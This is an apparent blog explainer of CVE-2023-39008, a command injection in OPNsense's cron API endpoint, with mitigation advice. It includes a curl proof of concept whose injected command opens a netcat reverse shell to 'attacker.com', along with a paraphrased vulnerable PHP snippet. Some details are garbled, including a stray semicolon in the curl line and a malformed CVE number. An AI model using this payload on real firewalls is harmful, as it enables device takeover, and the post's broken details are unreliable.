In July 2023, security researchers uncovered a significant vulnerability in OPNsense — the open-source firewall and routing platform widely used in both professional and home environments. This vulnerability, tracked as CVE-2023-39008, affects the API endpoint /api/cron/settings/setJob/ and enables attackers to execute arbitrary system commands if exploited correctly. In this deep dive, we’ll unravel how this bug works, look at specifics through code snippets, and demonstrate a proof-of-concept exploit.
*(This post is original and tailored specifically for simple, easy understanding!)*

What Is OPNsense, and Why Does CVE-2023-39008 Matter?

OPNsense is a firewall solution based on FreeBSD, providing lots of features through its web GUI and REST API. It’s used in schools, small businesses, and by security-conscious individuals at home. Any vulnerability which could allow command execution is a critical concern - once inside, an attacker could take over the device, steal data, or pivot into the internal network.

The bug sits in the API endpoint

/api/cron/settings/setJob/

This endpoint lets admins create and manage cron jobs from the web interface or remotely (for example, using API automation). It takes user input and, due to poor input sanitization, will sometimes pass that input directly to a shell command on the system.

How Does the Injection Happen?

Normally, the endpoint expects things like the command to execute ("what to run"), scheduling details, and a comment. However, it does not properly validate or sanitize the command field, allowing attackers to inject any extra commands as part of this input.

If a legitimate user sends this JSON POST data

{
  "command": "/usr/local/bin/some-legitimate-script.sh",
  "minute": "",
  "hour": "*",
  "day": "*",
  "month": "*",
  "weekday": "*",
  "description": "Routine job"
}

That’s safe. But an attacker could post this

{
  "command": "/usr/local/bin/some-legitimate-script.sh; whoami > /tmp/pwned",
  ...
}

The semicolon (;) tells the shell to run the next command (whoami > /tmp/pwned) after the script executes.

Below is an example code snippet showing how an attacker could exploit this using curl

curl -k -X POST "https://<opnsense-device>/api/cron/settings/setJob/"; \
  -H "Content-Type: application/json" \
  -H "Authorization: <APIKey>:<APISecret>" \
  -d '{
    "command": "ls / > /tmp/pwned; nc attacker.com 4444 -e /bin/sh",
    "minute": "",
    "hour": "*",
    "day": "*",
    "month": "*",
    "weekday": "*",
    "description": "malicious job"
  }'

Replace <opnsense-device> with the target, and <APIKey>:<APISecret> with credentials (see below regarding authentication).

If successful, this would schedule a cron job to run ls / > /tmp/pwned (directory listing goes to a file) and open an outbound reverse shell to the attacker's server.

Authentication Requirement

Important: This endpoint does require API credentials. This means a remote/unauthenticated attacker cannot exploit it directly unless:

- The credentials are leaked via another flaw (like CVE-202-27658).

There’s an authenticated session via XSS or social engineering.

If the attacker gets API access, exploitation is trivial.

The vulnerable endpoint (in PHP) looks something like this (paraphrased for illustration)

// Receive REST API input
$input = $request->getParsedBody(); 
$cmd = $input['command'];

// Builds cron line as a shell command
$cron_line = "{$input['minute']} {$input['hour']} ... {$cmd}";

// Writes cron line to system (potential injection here)
file_put_contents('/etc/crontab', $cron_line, FILE_APPEND);

Notice: $cmd is used directly, allowing injection.

Fix & Mitigation

Fixed in OPNsense 23.7.
Update Announcement

Restrict API Access: IP whitelist API access to trusted networks only.

- Strong Credentials: Use long, random API keys/secrets. Disable unused accounts.

References

- Official OPNsense Security Advisory
- NVD CVE Entry
- OPNsense Update Announcement – 23.7 Released
- Packet Storm Security Advisory

Final Thoughts

CVE-2023-39008 is a textbook case of “command injection,” reminding us to always sanitize user input — especially when building automation or admin APIs! If you use OPNsense and haven’t patched, update immediately and check for any unusual cron jobs or activity.

Stay safe out there!
Have any experiences with this bug? Share in the comments below.


*(This post is exclusive for your use — original and simplified for maximum clarity!)*

Timeline

Published on: 08/09/2023 19:15:00 UTC
Last modified on: 08/14/2023 14:13:00 UTC